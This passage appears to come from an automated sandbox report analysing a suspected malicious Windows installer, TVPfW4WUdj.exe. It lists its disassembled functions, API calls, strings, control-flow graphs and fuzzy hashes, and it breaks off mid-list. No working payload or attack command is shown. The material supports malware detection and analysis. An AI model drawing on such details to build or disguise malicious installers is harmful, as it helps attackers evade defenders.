                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                • Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
                                                                • Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                • Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45
                                                                Function 004065C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,75573420,004059B6,?,C:\Users\user\AppData\Local\Temp\,75573420), ref: 004065D2
                                                                • FindClose.KERNEL32(00000000), ref: 004065DE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Find$CloseFileFirst
                                                                • String ID: 8gB
                                                                • API String ID: 2295610775-1733800166
                                                                • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                • Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
                                                                • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                • Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698
                                                                Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne, xrefs: 004021C3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CreateInstance
                                                                • String ID: C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne
                                                                • API String ID: 542301482-334597386
                                                                • Opcode ID: 5cba2042925f0a607390c6eace5ead972fd1e42bd24b6c44ab96890c65fe79be
                                                                • Instruction ID: 81793f1010fc2e559759275c5502ec42cf4e228633e8d7c3619733a9a8aee0f9
                                                                • Opcode Fuzzy Hash: 5cba2042925f0a607390c6eace5ead972fd1e42bd24b6c44ab96890c65fe79be
                                                                • Instruction Fuzzy Hash: 34414B71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: FileFindFirst
                                                                • String ID:
                                                                • API String ID: 1974802433-0
                                                                • Opcode ID: 83698e80e24e563e54c4a8404194c01640705265cde1cffeb308655126ebb9a5
                                                                • Instruction ID: 42b58e9376e2aae4a6b7d1f769ff68ee5b2b2e9610aeafae56754381977d23d8
                                                                • Opcode Fuzzy Hash: 83698e80e24e563e54c4a8404194c01640705265cde1cffeb308655126ebb9a5
                                                                • Instruction Fuzzy Hash: FCF08271A14104EFDB10EBA4DE499AEB378EF04314F6045BBF505F21E1DBB45D419B2A
                                                                Function 00403D22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 190 403d22-403d34 191 403e75-403e84 190->191 192 403d3a-403d40 190->192 193 403ed3-403ee8 191->193 194 403e86-403ece GetDlgItem * 2 call 4041fb SetClassLongW call 40140b 191->194 192->191 195 403d46-403d4f 192->195 197 403f28-403f2d call 404247 193->197 198 403eea-403eed 193->198 194->193 199 403d51-403d5e SetWindowPos 195->199 200 403d64-403d67 195->200 212 403f32-403f4d 197->212 204 403f20-403f22 198->204 205 403eef-403efa call 401389 198->205 199->200 201 403d81-403d87 200->201 202 403d69-403d7b ShowWindow 200->202 207 403da3-403da6 201->207 208 403d89-403d9e DestroyWindow 201->208 202->201 204->197 211 4041c8 204->211 205->204 227 403efc-403f1b SendMessageW 205->227 216 403da8-403db4 SetWindowLongW 207->216 217 403db9-403dbf 207->217 213 4041a5-4041ab 208->213 215 4041ca-4041d1 211->215 219 403f56-403f5c 212->219 220 403f4f-403f51 call 40140b 212->220 213->211 222 4041ad-4041b3 213->222 216->215 225 403e62-403e70 call 404262 217->225 226 403dc5-403dd6 GetDlgItem 217->226 223 403f62-403f6d 219->223 224 404186-40419f DestroyWindow EndDialog 219->224 220->219 222->211 228 4041b5-4041be ShowWindow 222->228 223->224 229 403f73-403fc0 call 4062a6 call 4041fb * 3 GetDlgItem 223->229 224->213 225->215 230 403df5-403df8 226->230 231 403dd8-403def SendMessageW IsWindowEnabled 226->231 227->215 228->211 260 403fc2-403fc7 229->260 261 403fca-404006 ShowWindow KiUserCallbackDispatcher call 40421d EnableWindow 229->261 234 403dfa-403dfb 230->234 235 403dfd-403e00 230->235 231->211 231->230 238 403e2b-403e30 call 4041d4 234->238 239 403e02-403e08 235->239 240 403e0e-403e13 235->240 238->225 243 403e49-403e5c SendMessageW 239->243 244 403e0a-403e0c 239->244 240->243 245 403e15-403e1b 240->245 243->225 244->238 246 403e32-403e3b call 40140b 245->246 247 403e1d-403e23 call 40140b 245->247 246->225 257 403e3d-403e47 246->257 256 403e29 247->256 256->238 257->256 260->261 264 404008-404009 261->264 265 40400b 261->265 266 40400d-40403b GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404050 266->267 268 40403d-40404e SendMessageW 266->268 269 404056-404095 call 404230 call 403d03 call 406284 lstrlenW call 4062a6 SetWindowTextW call 401389 267->269 268->269 269->212 280 40409b-40409d 269->280 280->212 281 4040a3-4040a7 280->281 282 4040c6-4040da DestroyWindow 281->282 283 4040a9-4040af 281->283 282->213 285 4040e0-40410d CreateDialogParamW 282->285 283->211 284 4040b5-4040bb 283->284 284->212 286 4040c1 284->286 285->213 287 404113-40416a call 4041fb GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 40416c-40417f ShowWindow call 404247 287->292 294 404184 292->294 294->213
                                                                APIs
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
                                                                • ShowWindow.USER32(?), ref: 00403D7B
                                                                • DestroyWindow.USER32 ref: 00403D8F
                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
                                                                • GetDlgItem.USER32(?,?), ref: 00403DCC
                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
                                                                • IsWindowEnabled.USER32(00000000), ref: 00403DE7
                                                                • GetDlgItem.USER32(?,00000001), ref: 00403E95
                                                                • GetDlgItem.USER32(?,00000002), ref: 00403E9F
                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F0A
                                                                • GetDlgItem.USER32(?,00000003), ref: 00403FB0
                                                                • ShowWindow.USER32(00000000,?), ref: 00403FD1
                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
                                                                • EnableWindow.USER32(?,?), ref: 00403FFE
                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404014
                                                                • EnableMenuItem.USER32(00000000), ref: 0040401B
                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404033
                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
                                                                • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
                                                                • SetWindowTextW.USER32(?,004236E8), ref: 00404084
                                                                • ShowWindow.USER32(?,0000000A), ref: 004041B8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                • String ID: 6B
                                                                • API String ID: 3282139019-4127139157
                                                                • Opcode ID: 61e46f2e5d4e30b8d331e99b2e62090d3ddcc4212222171d7de82e9bf3d87482
                                                                • Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
                                                                • Opcode Fuzzy Hash: 61e46f2e5d4e30b8d331e99b2e62090d3ddcc4212222171d7de82e9bf3d87482
                                                                • Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D
                                                                Function 00403974 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 295 403974-40398c call 40665e 298 4039a0-4039d7 call 406152 295->298 299 40398e-40399e call 4061cb 295->299 303 4039d9-4039ea call 406152 298->303 304 4039ef-4039f5 lstrcatW 298->304 307 4039fa-403a23 call 403c4a call 405c61 299->307 303->304 304->307 313 403ab5-403abd call 405c61 307->313 314 403a29-403a2e 307->314 320 403acb-403af0 LoadImageW 313->320 321 403abf-403ac6 call 4062a6 313->321 314->313 315 403a34-403a5c call 406152 314->315 315->313 324 403a5e-403a62 315->324 322 403b71-403b79 call 40140b 320->322 323 403af2-403b22 RegisterClassW 320->323 321->320 337 403b83-403b8e call 403c4a 322->337 338 403b7b-403b7e 322->338 326 403c40 323->326 327 403b28-403b6c SystemParametersInfoW CreateWindowExW 323->327 329 403a74-403a80 lstrlenW 324->329 330 403a64-403a71 call 405b86 324->330 335 403c42-403c49 326->335 327->322 331 403a82-403a90 lstrcmpiW 329->331 332 403aa8-403ab0 call 405b59 call 406284 329->332 330->329 331->332 336 403a92-403a9c GetFileAttributesW 331->336 332->313 341 403aa2-403aa3 call 405ba5 336->341 342 403a9e-403aa0 336->342 348 403b94-403bae ShowWindow call 4065ee 337->348 349 403c17-403c18 call 4053bf 337->349 338->335 341->332 342->332 342->341 356 403bb0-403bb5 call 4065ee 348->356 357 403bba-403bcc GetClassInfoW 348->357 352 403c1d-403c1f 349->352 354 403c21-403c27 352->354 355 403c39-403c3b call 40140b 352->355 354->338 358 403c2d-403c34 call 40140b 354->358 355->326 356->357 361 403be4-403c07 DialogBoxParamW call 40140b 357->361 362 403bce-403bde GetClassInfoW RegisterClassW 357->362 358->338 365 403c0c-403c15 call 4038c4 361->365 362->361 365->335
                                                                APIs
                                                                  • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                  • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573420,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00000000), ref: 004039F5
                                                                • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\depersonaliseredes,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A75
                                                                • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\depersonaliseredes,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
                                                                • GetFileAttributesW.KERNEL32(: Completed), ref: 00403A93
                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\depersonaliseredes), ref: 00403ADC
                                                                  • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                • RegisterClassW.USER32(004291A0), ref: 00403B19
                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403B9C
                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
                                                                • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
                                                                • RegisterClassW.USER32(004291A0), ref: 00403BDE
                                                                • DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: "C:\Users\user\Desktop\TVPfW4WUdj.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\depersonaliseredes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                • API String ID: 1975747703-3472055290
                                                                • Opcode ID: 8587381b39fd61b124eaa29958d8087b8bcb74e0bb8df45c1207c7271d45e6f8
                                                                • Instruction ID: 9910424c6ca31f4cc559053cc35dfc0eeb30f3212361bd75bc0ff30566f1833d
                                                                • Opcode Fuzzy Hash: 8587381b39fd61b124eaa29958d8087b8bcb74e0bb8df45c1207c7271d45e6f8
                                                                • Instruction Fuzzy Hash: C961B870244600BFE630AF269D46F273A6CEB44B49F40057EF985B62E2DB7D5911CA2D
                                                                Function 00402EDD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 182COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 369 402edd-402f2b GetTickCount GetModuleFileNameW call 405d7a 372 402f37-402f65 call 406284 call 405ba5 call 406284 GetFileSize 369->372 373 402f2d-402f32 369->373 381 403052-403060 call 402e79 372->381 382 402f6b 372->382 374 40310f-403113 373->374 388 403062-403065 381->388 389 4030b5-4030ba 381->389 384 402f70-402f87 382->384 386 402f89 384->386 387 402f8b-402f94 call 4032fb 384->387 386->387 394 402f9a-402fa1 387->394 395 4030bc-4030c4 call 402e79 387->395 391 403067-40307f call 403311 call 4032fb 388->391 392 403089-4030b3 GlobalAlloc call 403311 call 403116 388->392 389->374 391->389 416 403081-403087 391->416 392->389 420 4030c6-4030d7 392->420 398 402fa3-402fb7 call 405d35 394->398 399 40301d-403021 394->399 395->389 407 40302b-403031 398->407 418 402fb9-402fc0 398->418 406 403023-40302a call 402e79 399->406 399->407 406->407 409 403040-40304a 407->409 410 403033-40303d call 406751 407->410 409->384 419 403050 409->419 410->409 416->389 416->392 418->407 422 402fc2-402fc9 418->422 419->381 423 4030d9 420->423 424 4030df-4030e4 420->424 422->407 425 402fcb-402fd2 422->425 423->424 426 4030e5-4030eb 424->426 425->407 427 402fd4-402fdb 425->427 426->426 428 4030ed-403108 SetFilePointer call 405d35 426->428 427->407 429 402fdd-402ffd 427->429 431 40310d 428->431 429->389 432 403003-403007 429->432 431->374 433 403009-40300d 432->433 434 40300f-403017 432->434 433->419 433->434 434->407 435 403019-40301b 434->435 435->407
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 00402EEE
                                                                • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                  • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                  • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                Strings
                                                                • Error launching installer, xrefs: 00402F2D
                                                                • Null, xrefs: 00402FD4
                                                                • "C:\Users\user\Desktop\TVPfW4WUdj.exe", xrefs: 00402EDD
                                                                • soft, xrefs: 00402FCB
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                • C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
                                                                • Inst, xrefs: 00402FC2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                • String ID: "C:\Users\user\Desktop\TVPfW4WUdj.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                • API String ID: 4283519449-674568989
                                                                • Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                • Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
                                                                • Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                • Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD
                                                                Function 004062A6 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 209stringCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 436 4062a6-4062b1 437 4062b3-4062c2 436->437 438 4062c4-4062da 436->438 437->438 439 4062e0-4062ed 438->439 440 4064f2-4064f8 438->440 439->440 441 4062f3-4062fa 439->441 442 4064fe-406509 440->442 443 4062ff-40630c 440->443 441->440 445 406514-406515 442->445 446 40650b-40650f call 406284 442->446 443->442 444 406312-40631e 443->444 447 406324-406362 444->447 448 4064df 444->448 446->445 450 406482-406486 447->450 451 406368-406373 447->451 452 4064e1-4064eb 448->452 453 4064ed-4064f0 448->453 456 406488-40648e 450->456 457 4064b9-4064bd 450->457 454 406375-40637a 451->454 455 40638c 451->455 452->440 453->440 454->455 460 40637c-40637f 454->460 463 406393-40639a 455->463 461 406490-40649c call 4061cb 456->461 462 40649e-4064aa call 406284 456->462 458 4064cc-4064dd lstrlenW 457->458 459 4064bf-4064c7 call 4062a6 457->459 458->440 459->458 460->455 468 406381-406384 460->468 473 4064af-4064b5 461->473 462->473 464 40639c-40639e 463->464 465 40639f-4063a1 463->465 464->465 471 4063a3-4063c1 call 406152 465->471 472 4063dc-4063df 465->472 468->455 474 406386-40638a 468->474 479 4063c6-4063ca 471->479 477 4063e1-4063ed GetSystemDirectoryW 472->477 478 4063ef-4063f2 472->478 473->458 476 4064b7 473->476 474->463 480 40647a-406480 call 406518 476->480 481 406461-406465 477->481 482 4063f4-406402 GetWindowsDirectoryW 478->482 483 40645d-40645f 478->483 484 4063d0-4063d7 call 4062a6 479->484 485 40646a-40646d 479->485 480->458 481->480 487 406467 481->487 482->483 483->481 486 406404-40640e 483->486 484->481 485->480 490 40646f-406475 lstrcatW 485->490 492 406410-406413 486->492 493 406428-40643e SHGetSpecialFolderLocation 486->493 487->485 490->480 492->493 497 406415-40641c 492->497 494 406440-406457 SHGetPathFromIDListW CoTaskMemFree 493->494 495 406459 493->495 494->481 494->495 495->483 498 406424-406426 497->498 498->481 498->493
                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063E7
                                                                • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,00405323,Completed,00000000), ref: 004063FA
                                                                • SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Completed,?,00405323,Completed,00000000), ref: 00406436
                                                                • SHGetPathFromIDListW.SHELL32(00410EA0,: Completed), ref: 00406444
                                                                • CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
                                                                • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
                                                                • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,00405323,Completed,00000000), ref: 004064CD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
